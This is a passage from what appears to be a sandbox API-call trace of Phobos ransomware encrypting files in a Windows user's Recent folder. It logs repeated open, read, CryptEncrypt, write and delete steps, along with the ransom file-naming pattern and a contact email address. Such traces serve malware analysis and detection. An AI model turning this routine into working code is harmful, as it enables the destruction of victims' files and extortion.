HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IQCk1WOIKqKA.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\iqck1woikqka.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.793] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.793] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.794] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x401, lpOverlapped=0x0) returned 1 [0200.795] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x410, dwBufLen=0x410 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x410) returned 1 [0200.795] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x410, lpOverlapped=0x0) returned 1 [0200.796] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0200.796] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.796] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.796] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.796] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.796] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.796] CloseHandle (hObject=0x178) returned 1 [0200.796] CloseHandle (hObject=0x124) returned 1 [0200.797] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IQCk1WOIKqKA.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\iqck1woikqka.lnk")) returned 1 [0200.797] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iS_jkuVwRL9K_cbE87FG.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\is_jkuvwrl9k_cbe87fg.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.798] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=4007) returned 1 [0200.798] CloseHandle (hObject=0x124) returned 1 [0200.799] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iS_jkuVwRL9K_cbE87FG.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\is_jkuvwrl9k_cbe87fg.lnk")) returned 0x20 [0200.799] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iS_jkuVwRL9K_cbE87FG.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\is_jkuvwrl9k_cbe87fg.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iS_jkuVwRL9K_cbE87FG.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\is_jkuvwrl9k_cbe87fg.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.799] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.799] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iS_jkuVwRL9K_cbE87FG.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\is_jkuvwrl9k_cbe87fg.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.800] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.800] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.800] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xfa7, lpOverlapped=0x0) returned 1 [0200.802] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xfb0, dwBufLen=0xfb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xfb0) returned 1 [0200.802] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xfb0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xfb0, lpOverlapped=0x0) returned 1 [0200.803] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0200.803] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.803] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0200.803] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.803] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0200.803] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.803] CloseHandle (hObject=0x124) returned 1 [0200.803] CloseHandle (hObject=0x178) returned 1 [0200.803] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iS_jkuVwRL9K_cbE87FG.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\is_jkuvwrl9k_cbe87fg.lnk")) returned 1 [0200.805] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iXUq7CwZ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ixuq7cwz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.806] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2593) returned 1 [0200.806] CloseHandle (hObject=0x178) returned 1 [0200.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iXUq7CwZ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ixuq7cwz.lnk")) returned 0x20 [0200.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iXUq7CwZ.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ixuq7cwz.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iXUq7CwZ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ixuq7cwz.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.806] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.806] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iXUq7CwZ.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ixuq7cwz.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.807] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.807] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.807] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa21, lpOverlapped=0x0) returned 1 [0200.809] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa30, dwBufLen=0xa30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa30) returned 1 [0200.809] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa30, lpOverlapped=0x0) returned 1 [0200.810] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0200.810] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.810] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.810] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.810] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.810] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.810] CloseHandle (hObject=0x178) returned 1 [0200.810] CloseHandle (hObject=0x124) returned 1 [0200.810] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iXUq7CwZ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ixuq7cwz.lnk")) returned 1 [0200.812] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i_1YLNTeDDRTI6iyC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i_1ylnteddrti6iyc.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.813] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5380) returned 1 [0200.813] CloseHandle (hObject=0x124) returned 1 [0200.813] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i_1YLNTeDDRTI6iyC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i_1ylnteddrti6iyc.lnk")) returned 0x20 [0200.813] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i_1YLNTeDDRTI6iyC.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i_1ylnteddrti6iyc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i_1YLNTeDDRTI6iyC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i_1ylnteddrti6iyc.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.813] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.813] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i_1YLNTeDDRTI6iyC.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i_1ylnteddrti6iyc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.814] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.814] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.814] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1504, lpOverlapped=0x0) returned 1 [0200.816] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1510, dwBufLen=0x1510 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1510) returned 1 [0200.816] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1510, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1510, lpOverlapped=0x0) returned 1 [0200.817] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0200.817] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.817] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.817] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.817] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.817] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.817] CloseHandle (hObject=0x124) returned 1 [0200.818] CloseHandle (hObject=0x178) returned 1 [0200.818] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i_1YLNTeDDRTI6iyC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i_1ylnteddrti6iyc.lnk")) returned 1 [0200.819] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jFlmEksOzI.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jflmeksozi.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.820] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2615) returned 1 [0200.820] CloseHandle (hObject=0x178) returned 1 [0200.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jFlmEksOzI.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jflmeksozi.lnk")) returned 0x20 [0200.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jFlmEksOzI.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jflmeksozi.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jFlmEksOzI.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jflmeksozi.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.820] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.820] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jFlmEksOzI.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jflmeksozi.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.824] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.824] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.824] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa37, lpOverlapped=0x0) returned 1 [0200.866] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa40, dwBufLen=0xa40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa40) returned 1 [0200.866] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa40, lpOverlapped=0x0) returned 1 [0200.867] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0200.867] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.867] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.867] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.867] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.867] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.867] CloseHandle (hObject=0x178) returned 1 [0200.867] CloseHandle (hObject=0x124) returned 1 [0200.867] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jFlmEksOzI.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jflmeksozi.lnk")) returned 1 [0200.869] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KHAg3aeSzIAQ7EZZfgDY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\khag3aesziaq7ezzfgdy.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.871] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3831) returned 1 [0200.871] CloseHandle (hObject=0x124) returned 1 [0200.871] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KHAg3aeSzIAQ7EZZfgDY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\khag3aesziaq7ezzfgdy.lnk")) returned 0x20 [0200.871] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KHAg3aeSzIAQ7EZZfgDY.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\khag3aesziaq7ezzfgdy.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KHAg3aeSzIAQ7EZZfgDY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\khag3aesziaq7ezzfgdy.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.871] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, 